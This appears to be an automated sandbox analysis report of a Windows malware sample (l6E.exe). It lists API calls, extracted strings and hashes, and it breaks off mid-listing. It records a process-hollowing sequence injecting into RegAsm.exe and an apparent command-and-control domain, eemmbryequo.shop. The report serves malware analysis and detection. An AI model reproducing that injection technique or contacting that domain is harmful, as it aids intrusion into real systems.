Function 015067A3 Relevance: 5.1, Strings: 4, Instructions: 149COMMON

Download Yara Rule

Strings

ob0, xrefs: 01506A4F
.&1>, xrefs: 0150691C
t`n(, xrefs: 0150687C
X^v, xrefs: 01506926

Memory Dump Source

Source File: 00000005.00000002.49682765546.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1500000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: .&1>$X^v$ob0$t`n(
API String ID: 0-3849121580
Opcode ID: a9d56eea6f4e47fc4a5109ed3a9bd0691775879f007d44aeae5c10b479a2d2c2
Instruction ID: b0f21f432e9fcb6b46ca73c739829c3ac735c3e9b421cfd6b96db2a05431d726
Opcode Fuzzy Hash: a9d56eea6f4e47fc4a5109ed3a9bd0691775879f007d44aeae5c10b479a2d2c2
Instruction Fuzzy Hash: ED9166B0805B848FD359CF5A8599BA4BBE0BF9A300F5A82FA815C8F232E7358545CF51

Analysis Process: l6E.exePID: 4820, Parent PID: 1468COMMON

Execution Graph

Execution Coverage:	39%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	23.5%
Total number of Nodes:	34
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0269214D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,026920BF,026920AF), ref: 026922BC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 026922CF
Wow64GetThreadContext.KERNEL32(000003B4,00000000), ref: 026922ED
ReadProcessMemory.KERNELBASE(000003B0,?,02692103,00000004,00000000), ref: 02692311
VirtualAllocEx.KERNELBASE(000003B0,?,?,00003000,00000040), ref: 0269233C
TerminateProcess.KERNELBASE(000003B0,00000000), ref: 0269235B
WriteProcessMemory.KERNELBASE(000003B0,00000000,?,?,00000000,?), ref: 02692394
WriteProcessMemory.KERNELBASE(000003B0,00400000,?,?,00000000,?,00000028), ref: 026923DF
WriteProcessMemory.KERNELBASE(000003B0,?,?,00000004,00000000), ref: 0269241D
Wow64SetThreadContext.KERNEL32(000003B4,052D0000), ref: 02692459
ResumeThread.KERNELBASE(000003B4), ref: 02692468

Strings

ResumeThread, xrefs: 02692289
ress, xrefs: 026921D7
VirtualAllocEx, xrefs: 0269224D
CreateProcessA, xrefs: 02692201
GetThreadContext, xrefs: 02692227
SetThreadContext, xrefs: 02692273
WriteProcessMemory, xrefs: 02692260
ReadProcessMemory, xrefs: 0269223A
GetP, xrefs: 026921CF
VirtualAlloc, xrefs: 02692214
TerminateProcess, xrefs: 0269234B
aryA, xrefs: 02692193
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 026922BB
Load, xrefs: 0269218B

Memory Dump Source

Source File: 0000000A.00000002.50064563839.0000000002691000.00000040.00000800.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2691000_l6E.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: c96b648ca46fdf8a2ea06f0aa11173d4c0867391b5dbfd159acfd4e6bff85252
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 7EB1D57664024AAFDB60CF68CC80BDA77A9FF88714F158524EA0CAB341D774FA51CB94

Function 024D0B8F Relevance: 1.8, APIs: 1, Instructions: 298
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03693590,026924B8,?,00000064,?,?,?,?,03693590,?,?,024D0A34,00000064,00000040), ref: 024D0F31

Memory Dump Source

Source File: 0000000A.00000002.50064323150.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24d0000_l6E.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 54277c3880c67b169dd0cafe053b208777d04a65e71b3620a85e0c9b2fbce42e
Instruction ID: 1f5be1b9278a4de44d2269897f683d9f36284b0feccd76a29e6521241bc0898c
Opcode Fuzzy Hash: 54277c3880c67b169dd0cafe053b208777d04a65e71b3620a85e0c9b2fbce42e
Instruction Fuzzy Hash: D3C1BE70A141589FCB01CFA9C590AEDFBF2BF88314F2495AAD848E7246C374AD41CBA4

Function 024D0500 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03693590,026924B8,?,00000064,?,?,?,?,03693590,?,?,024D0A34,00000064,00000040), ref: 024D0F31

Memory Dump Source

Source File: 0000000A.00000002.50064323150.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24d0000_l6E.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ee8af6dd69faab8f00be34b676df88c75998b9998910f75c6d975dbf9eb8160a
Instruction ID: 03fb6f030cae2737453dbf5290145e9ad71e09b13b68f8e806715fadfa6fba79
Opcode Fuzzy Hash: ee8af6dd69faab8f00be34b676df88c75998b9998910f75c6d975dbf9eb8160a
Instruction Fuzzy Hash: 7E21B2B5D1025DAFCB10DF9AD884ADEFBB4FB48314F50815AE918A7240D3B4A954CBA1

Function 00C5D005 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.50064065894.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_c5d000_l6E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100665b6cb2a76944e73ed37ade792e745f9499174e17934a9073a4116b36e76
Instruction ID: b3e2ee043100ff82be29048bf4d96eefde3f06481afdc06e1a1f08f3848bea9f
Opcode Fuzzy Hash: 100665b6cb2a76944e73ed37ade792e745f9499174e17934a9073a4116b36e76
Instruction Fuzzy Hash: 9C01406140D3C05ED7228B258894752BFB89F53225F1981DBDC958F2E7C2695889C772

Function 00C5D01D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.50064065894.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_c5d000_l6E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142993ba73073014d6f53c751a5f4efec53f77220cdf9e5f92374d73b59e2b5d
Instruction ID: b051f9c940632c8ae2c69ef6d66cc2d0e17ef469b1bbc82c7cb6dfba0fb39c34
Opcode Fuzzy Hash: 142993ba73073014d6f53c751a5f4efec53f77220cdf9e5f92374d73b59e2b5d
Instruction Fuzzy Hash: AA01F775404340AED7304E1AC8C0B76FF98DF85331F18841AEC560A2C6C2799989D6B5

Analysis Process: RegAsm.exePID: 7340, Parent PID: 4820COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.6%
Total number of Nodes:	107
Total number of Limit Nodes:	10

Executed Functions

Function 00410BE0 Relevance: 31.2, APIs: 4, Strings: 13, Instructions: 1452COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00410CF4
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D16
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004110CE

Strings

IK, xrefs: 004116C1
}vw1, xrefs: 00411563
~ivw, xrefs: 00410F95
qD, xrefs: 00410DA8, 00411546
yq, xrefs: 00411ACA
SRQ, xrefs: 00411B56
gyD, xrefs: 00410D39, 004114D5
z_~], xrefs: 00411B41
4`[b, xrefs: 00411D36
eemmbryequo.shop, xrefs: 00411098, 0041183E
XWRI, xrefs: 00411571
NP]V, xrefs: 00410DB7
B07EE781B129FD4CDB71E32F12885CB3, xrefs: 00410D2C

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize$DirectorySecuritySystem
String ID: SRQ$4`[b$B07EE781B129FD4CDB71E32F12885CB3$NP]V$XWRI$eemmbryequo.shop$gyD$yq$z_~]$}vw1$~ivw$IK$qD
API String ID: 1379780170-3940657489
Opcode ID: 492c9a379bf2d3dd75b785a90ac646fccacec2dccfa925f6ca8c36976fddcd41
Instruction ID: 6f00782ad97520384e293a367abf36bc81143bd9cc685f1fbd78c856541c4a9f
Opcode Fuzzy Hash: 492c9a379bf2d3dd75b785a90ac646fccacec2dccfa925f6ca8c36976fddcd41
Instruction Fuzzy Hash: E6B2CCB4500B418FD320CF25C991627BBF2FF46304F188A6DD89A4BB96D739E845CB95

Function 0040F140 Relevance: 20.8, Strings: 16, Instructions: 821
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>M"S, xrefs: 0040F275
/Q6W, xrefs: 0040F27F
?1, xrefs: 0040FED0, 0040FEE1, 0040FED4, 0040FEF9
B1A7, xrefs: 0040F40F
?1, xrefs: 0040FC48
KH, xrefs: 0040FD08
wI, xrefs: 0040FD18
47, xrefs: 0040FC17
[-I3, xrefs: 0040F405
Y$_, xrefs: 0040F293
9I>O, xrefs: 0040F26B
[)[/, xrefs: 0040F3FB
ME, xrefs: 0040F351
35, xrefs: 0040FC0F
C{, xrefs: 0040FD10
N5:;, xrefs: 0040F419

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: /Q6W$47$9I>O$>M"S$B1A7$C{$KH$ME$N5:;$[)[/$[-I3$wI$35$?1$?1$Y$_
API String ID: 0-3722392735
Opcode ID: d5688afe9e16cc9e114ddf5bf77c3466e9b513f590a0714ce7082d429fda793a
Instruction ID: 9871c3acc0268e31732353829f9dbe7047a20432e069500f76a40a7f8366a2b4
Opcode Fuzzy Hash: d5688afe9e16cc9e114ddf5bf77c3466e9b513f590a0714ce7082d429fda793a
Instruction Fuzzy Hash: 0D5287B4204B01CFD324CF25D890B6BBBF5FB8A714F14892CE5DA976A0DB74A805CB95

Function 00438965 Relevance: 10.9, APIs: 7, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 004389A4
SysStringLen.OLEAUT32(1B8E19F9), ref: 00438A63
VariantClear.OLEAUT32(?), ref: 00438BEB
SysFreeString.OLEAUT32(?), ref: 00438D4A
SysFreeString.OLEAUT32(?), ref: 00438D4F
SysFreeString.OLEAUT32(?), ref: 00438D62
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438D9C

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: String$Free$Variant$ClearInformationInitVolume
String ID:
API String ID: 171077572-0
Opcode ID: f7226a61be22f9aab40d1267c7b9f050eab233a492f1645a052a43e24a1f97ae
Instruction ID: c664eb92471d008439a5f31dc4f4d910bd41c18a0a2c1118259a84adc2214aa6
Opcode Fuzzy Hash: f7226a61be22f9aab40d1267c7b9f050eab233a492f1645a052a43e24a1f97ae
Instruction Fuzzy Hash: B2D1CEB9604701DFD324CF25C891B26B7B2FF8A310F18896DE1828BBA1DB35B855CB54

Function 0043FF03 Relevance: 2.7, Strings: 2, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hwE, xrefs: 0043FF03
hwE, xrefs: 00440059

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: hwE$hwE
API String ID: 0-2891829091
Opcode ID: bbead38ae8bcc4808cdfffc1341ff737f0729890d01f0c3ca068a9a4c4ca1923
Instruction ID: 62b1b85beeb4fb19d260c96fd4a62626bec542ab1f62aa292d1cbea6979e11a1
Opcode Fuzzy Hash: bbead38ae8bcc4808cdfffc1341ff737f0729890d01f0c3ca068a9a4c4ca1923
Instruction Fuzzy Hash: ED6102B5A002258BDB18CF64D86177FBBB2FF49314F18942ED506AB391D73A9D01CB98

Function 004402B8 Relevance: 2.6, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%sgh, xrefs: 00440420
%sgh, xrefs: 00440340

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %sgh$%sgh
API String ID: 0-986295974
Opcode ID: c896036a05dee7ea2b619425ae58ec52f7b6870536429c25099fcad4324353b8
Instruction ID: f96f60436dfc13a5c769c484d5aca88530843bbd63be72b4560f8e0f9583d5c5
Opcode Fuzzy Hash: c896036a05dee7ea2b619425ae58ec52f7b6870536429c25099fcad4324353b8
Instruction Fuzzy Hash: 7E41F575B002069BEB18CFA8CC51B7FBBB2FB49321F245429E612B33D1D734A8218758

Function 00438710 Relevance: 1.6, APIs: 1, Instructions: 88
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00447100,00000000,00000001,004470F0,?), ref: 0043881F

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 2689d68e32cf969f7025d9450a406d5e453a019d497f6984ed9507c1e6bee86b
Instruction ID: b8627ae8c7876617a9c8a9bac29ed8b80210b222980058296c7f894c70c157ea
Opcode Fuzzy Hash: 2689d68e32cf969f7025d9450a406d5e453a019d497f6984ed9507c1e6bee86b
Instruction Fuzzy Hash: 533113B46117009FE360CF19C985B02BBF1FB0A315F248A5DE5998F792C776E806CB95

Function 0043F5F0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00411D5D,00000000,00000001,00000000), ref: 0043F61E

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00442EC0 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

@, xrefs: 00442F85

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: d69a9c49070cf67fc5f7919c2a77e2c5e90c7debf02a03e7d45a884f75a1bf46
Instruction ID: e92f22d9f4acffcbf7de0d217b842fb0ccb3970c9b9da6fd09a13da8caa91dcf
Opcode Fuzzy Hash: d69a9c49070cf67fc5f7919c2a77e2c5e90c7debf02a03e7d45a884f75a1bf46
Instruction Fuzzy Hash: 4A4127B59083108BD714CF14C891A2BF7F1FFC5714F188A2DE9851B395D3799909CB9A

Function 00440477 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00440520

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b
API String ID: 2994545307-3962175265
Opcode ID: 14a1c6b4103a3b1cc370eced5722791e4b5c2480ebc9bf80c0b2a2770945f5b5
Instruction ID: 705f77c538cf701ee9432ecd4e9f2cee3d001c29c10f65d5af61ed0840c02ffb
Opcode Fuzzy Hash: 14a1c6b4103a3b1cc370eced5722791e4b5c2480ebc9bf80c0b2a2770945f5b5
Instruction Fuzzy Hash: D431917AF102099BDB1CCF54C8A0A7FB772EB89311F64512DD51293355CB38AD11CB98

Function 0043F9B1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd7933c12dd091d8b54dc3d59e047c47cc3032a0b395b024960e2cda77aadca
Instruction ID: f7671efb9f3e4410520bd080d893541f20fa6648ea4991458b41156305fe3c0f
Opcode Fuzzy Hash: dcd7933c12dd091d8b54dc3d59e047c47cc3032a0b395b024960e2cda77aadca
Instruction Fuzzy Hash: 78414FB5E002168BDB18CF58C8A0A7FB7B2FB9E310F145539D452A37A5C738A905CB98

Function 00439066 Relevance: 31.7, APIs: 4, Strings: 14, Instructions: 212
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 00438E38
SysAllocString.OLEAUT32(?), ref: 00438EF4
SysAllocString.OLEAUT32(?), ref: 00438F88
SysAllocString.OLEAUT32(?), ref: 00439044

Strings

q7bI, xrefs: 00438FA0
l3u5, xrefs: 00438E4A
hKpM, xrefs: 00438E58
"_kQ, xrefs: 00438FCA
q7bI, xrefs: 00438E51
l3u5, xrefs: 00438F99
bS3U, xrefs: 00438E82
1[!], xrefs: 00438FC3
bS3U, xrefs: 00438FD1
hKpM, xrefs: 00438FA7
1[!], xrefs: 00438E74
9k?m, xrefs: 00438FDF
9k?m, xrefs: 00438E90
"_kQ, xrefs: 00438E7B

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: "_kQ$"_kQ$1[!]$1[!]$9k?m$9k?m$bS3U$bS3U$hKpM$hKpM$l3u5$l3u5$q7bI$q7bI
API String ID: 2525500382-2445104418
Opcode ID: 9c25347f51590679b1a05d077fabee5c32a9e37345f8bed9ba9bf0896f822414
Instruction ID: 54f507a62156bebdac26ff37e2e6bff31f38ecb7ff0fd025f4eaf641b77a3776
Opcode Fuzzy Hash: 9c25347f51590679b1a05d077fabee5c32a9e37345f8bed9ba9bf0896f822414
Instruction Fuzzy Hash: 4281F7B8601642CFD324CF29C590A16FBF2FF59700B25999DE1858B756D739E882CF88

Function 00438DCC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 108
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 00438E38
SysAllocString.OLEAUT32(?), ref: 00438EF4

Strings

bS3U, xrefs: 00438E82
l3u5, xrefs: 00438E4A
hKpM, xrefs: 00438E58
q7bI, xrefs: 00438E51
1[!], xrefs: 00438E74
9k?m, xrefs: 00438E90
"_kQ, xrefs: 00438E7B

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: "_kQ$1[!]$9k?m$bS3U$hKpM$l3u5$q7bI
API String ID: 2525500382-1023481837
Opcode ID: fcecd9244e9eb79145b595313e63c63f3da10d520ef7bbeccc347ee165e4c5fb
Instruction ID: 0b095b8ea2cc7c16abf242c71ae79ddd11a11e83aac7d7184ad47ec88ad69c00
Opcode Fuzzy Hash: fcecd9244e9eb79145b595313e63c63f3da10d520ef7bbeccc347ee165e4c5fb
Instruction Fuzzy Hash: CF411AB5601642CFD324CF29C891A56FBF2FF59700B15895DE1858B752D739E882CF88

Function 0040CC70 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 173
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040CC81
GetCurrentThreadId.KERNEL32 ref: 0040CC96
GetCurrentProcessId.KERNEL32 ref: 0040CC9C
ExitProcess.KERNEL32 ref: 0040CEC3

Strings

C@AN, xrefs: 0040CE51
GDEB, xrefs: 0040CE76

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: C@AN$GDEB
API String ID: 1029096631-2942872560
Opcode ID: 319c7390126cda4affaf29332fc145eafc8d567c142d53829af47567f68ef202
Instruction ID: 924a06826b1a4f6b6fded20c3f77b9734a7bd88c1b5050a39c28c25b4756a7c1
Opcode Fuzzy Hash: 319c7390126cda4affaf29332fc145eafc8d567c142d53829af47567f68ef202
Instruction Fuzzy Hash: E251573420C2408BC304EF29C590A1EBBE2AFA9304F14892EE1C9D7392D73AD855CB5A

Function 00438915 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 004388B1
SysAllocString.OLEAUT32(?), ref: 004388C1

Strings

Ig:e, xrefs: 00438837
7o=m, xrefs: 00438845

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: 7o=m$Ig:e
API String ID: 2525500382-1610144716
Opcode ID: 1055ae3124dae8b4d64f13db96056a78880a6b046468afb37f412dce2dae4fd5
Instruction ID: 52fadc1ac9845a5e4bb94f0abae8bc5a888d2bb82389ddc5ad5d353116774162
Opcode Fuzzy Hash: 1055ae3124dae8b4d64f13db96056a78880a6b046468afb37f412dce2dae4fd5
Instruction Fuzzy Hash: 79312778105A41DFE324CF29C590A26FBF1FF6A700BA4895EE1D587751CB35B851CB88

Function 00438865 Relevance: 3.1, APIs: 2, Instructions: 72
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 004388B1
SysAllocString.OLEAUT32(?), ref: 004388C1

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 850443e07cbc43b5b73fcc98b350ab11906de1ea00fccbe66ef9a9751e0e041b
Instruction ID: f5e0b8ac4d325a8157337a93037ea0c703ebf6bec3e94e95a72b31b803c2c517
Opcode Fuzzy Hash: 850443e07cbc43b5b73fcc98b350ab11906de1ea00fccbe66ef9a9751e0e041b
Instruction Fuzzy Hash: FD110A79105681CFE329DF2CC490926F7F1BF6E7417A4899EE1D1C3256CB39A811CB98

Function 0043C6C0 Relevance: 1.5, APIs: 1, Instructions: 47
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043C748

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 278972eeccccce8c3bb079b8a71884a8d99889c35abdeea3527f99e85295ce6a
Instruction ID: 77713dd7e7ccc6e1d66318f2431b96eb9367786e404c84fc1cdf9d2c9ab70376
Opcode Fuzzy Hash: 278972eeccccce8c3bb079b8a71884a8d99889c35abdeea3527f99e85295ce6a
Instruction Fuzzy Hash: 6E01807420C2408BD309EF18D4A0A2FFBE6EF99310F15896DE5C6077A1C7359C21CB8A

Function 0043893D Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043894D

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 0f76b0e67aad5fee622d632b9615b9297596acef8340ea34ba485654fa9c48cc
Instruction ID: 1ce2a0ccd47f01b57d4d31088805f3bf7688858bf63d1b398d0249e5e2a0de8c
Opcode Fuzzy Hash: 0f76b0e67aad5fee622d632b9615b9297596acef8340ea34ba485654fa9c48cc
Instruction Fuzzy Hash: D9C048387C5341BAF2320B14EC5BF047A24AB0BF02F200070B342BC0E08AE266229A9D

Function 0043C6A2 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043C6A8

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 65bf2853d598ca7f490b11fcc6c18d681d9348de961b5dd5a0c8e85b41f53808
Instruction ID: 11c9cc438aaf921fd821634cf3b0c9f57618a2dd66683fb2723a91d86765de0b
Opcode Fuzzy Hash: 65bf2853d598ca7f490b11fcc6c18d681d9348de961b5dd5a0c8e85b41f53808
Instruction Fuzzy Hash: 24B012700041005BEA002B18BC05B643A14EB00205F2000A0F404480E3C1129CB3D58C

Non-executed Functions

Function 00401000 Relevance: 13.2, Strings: 9, Instructions: 1913COMMON

Download Yara Rule

Strings

-, xrefs: 0040225C
gfff, xrefs: 00402354
gfff, xrefs: 00402293
A, xrefs: 0040221F
gfff, xrefs: 004022A8
@, xrefs: 00401884
0123456789abcdefxp, xrefs: 0040144E, 004014BB
gfff, xrefs: 00402308
0123456789ABCDEFXP, xrefs: 00401442, 004014AB

Memory Dump Source

Source File: 0000000D.00000002.50080038323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff$gfff
API String ID: 0-3313470780
Opcode ID: 13d45231ab621d7ae85317070d24d6422883248f2712f4e7e2f5ee0b4bafe036
Instruction ID: 2651e6c4681165b9f2c34eccb60416a216c6453538c70c7e483689a38fd4a6bf
Opcode Fuzzy Hash: 13d45231ab621d7ae85317070d24d6422883248f2712f4e7e2f5ee0b4bafe036
Instruction Fuzzy Hash: 18E2E2716083518FD718CE28C49466BBBE2ABC9314F18863EE895EB3D1D778DD05CB86

Function 0041CC90 Relevance: 12.4, Strings: 9, Instructions: 1145COMMON

Download Yara Rule

Strings

